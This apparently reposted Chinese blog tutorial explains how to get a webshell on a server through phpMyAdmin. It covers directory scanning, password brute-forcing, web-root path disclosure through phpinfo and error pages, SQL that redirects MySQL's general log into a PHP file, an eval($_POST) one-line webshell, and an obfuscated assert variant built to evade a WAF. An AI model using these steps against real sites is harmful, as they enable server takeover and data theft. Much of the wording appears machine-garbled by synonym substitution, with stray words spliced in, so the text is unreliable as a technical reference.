phpMyAdmin的操作
生活就是泥沙俱下,鲜花和荆棘并存。——毕淑敏
1、明确方针
2、信息收集
3、缝隙挖掘和操作
操作目录扫描工具,对方针网站进行扫描,获取网站目录。常用工具有Kali中的DirBuster、dirb和wwwscan等。
我用的是Kali中的DirBuster,对方针进行扫描。
操作内置的文件,(…../phpMyAdmin/README)获取phpMyAdmin的版本信息。
一般网站打点员不会把这个目录删除,所以可以成为我们操作的一个点。 明确登录口令
有两种要领,手工和暴力破解。手工就是用一些弱口令进行猜解。
暴力破解可以用phpMyAdmin多线程批量破解工具来对phpMyAdmin进行暴力破解。
但是工具只是给我们供给参考的,而且工具爆破对phpMyAdmin的版本有必然的要求。 明确系统类型
因为系统版本的差别,对权限的控制是差此外。Linux系统对权限的控制相对严格,而window则相对较为分散的。所以说对window进行getshell对比Linux要容易。
明确php版本和数据库版本可以在phpMyAdmin的打点也可以看到php版本、MySQL版本,,系统类型。
因为php版本的差异,对渗透的操作是不一样的。 获取网站真实路径phpinfo()函数直接获取
通过phpinfo.php或者phpinfo()进行获取网站真实路径。
php 大专栏 getshell技巧-phpMyAdmin的操作info.php中会有大量的信息,有php版本、网站路径等。 结构报错页面获取网站真实路径
通过结构报错可能会报出网站的真实路径。常见的有页面访谒报错、sql注入报错,文件包罗报错。
phpmyadmin报错常见路径:
/phpMyAdmin/libraries/lect_lang.lib.php
/phpMyAdmin/index.php?lang[]=1
/phpMyAdmin/phpinfo.php
/phpMyAdmin/themes/darkblue_orange/layout.inc.php
/phpMyAdmin/libraries/select_lang.lib.php
/phpMyAdmin/libraries/lect_lang.lib.php
/phpMyAdmin/libraries/mcrypt.lib.php
借助搜索引擎,例如:百度、谷歌、fofa、shadon、zoomeye等,搜索关键字“error”,可能会报出网站的真实路径。
缝隙挖掘和操作满足写shell的前提条件SHOW VARIABLES LIKE “%secure_file_priv%”; 检察读写文件路径 “secure_file_priv”对应的值不能为null,为null就不能正常写入shell。
日志写shell首先需要检测MySQL全局变量(general_log、general_log_file)的值。
general_log是日志生存状态,一共有两个值(ON/OFF),ON代表开启,OFF代表封锁。
general_log_file是日志的生存路径
1、开启日志生存
set global general_log=”ON”;
set global general_log_file=”D:/phpStudy/WWW/infos.php”(网站真实路径)
2、写shell
select ‘<?php eval($_POST[yumu)];?>’
免杀(绕过安适狗)
$arr = array(‘a’,’s’,’s’,’s’,’e’,’r’,’t’);
$func = “”;
for($i=0;$i<count($arr);$i++){
$func = $func.$arr[$i];
}
$func = substr($func,-6);
$func($_REQUEST[‘c’]);
#总结
在操作phpMyAdmin来getshell时,需要注意对网站信息的收集,出格是网站的PHP版本、网站真实路径。这样才华更好的对网站就行缝隙挖掘。
从phpinfo到phpmyadmin的综合渗透操作
getshell技巧-phpMyAdmin的操作
温馨提示: 本文由Jm博客推荐,转载请保留链接: https://www.jmwww.net/file/web/33039.html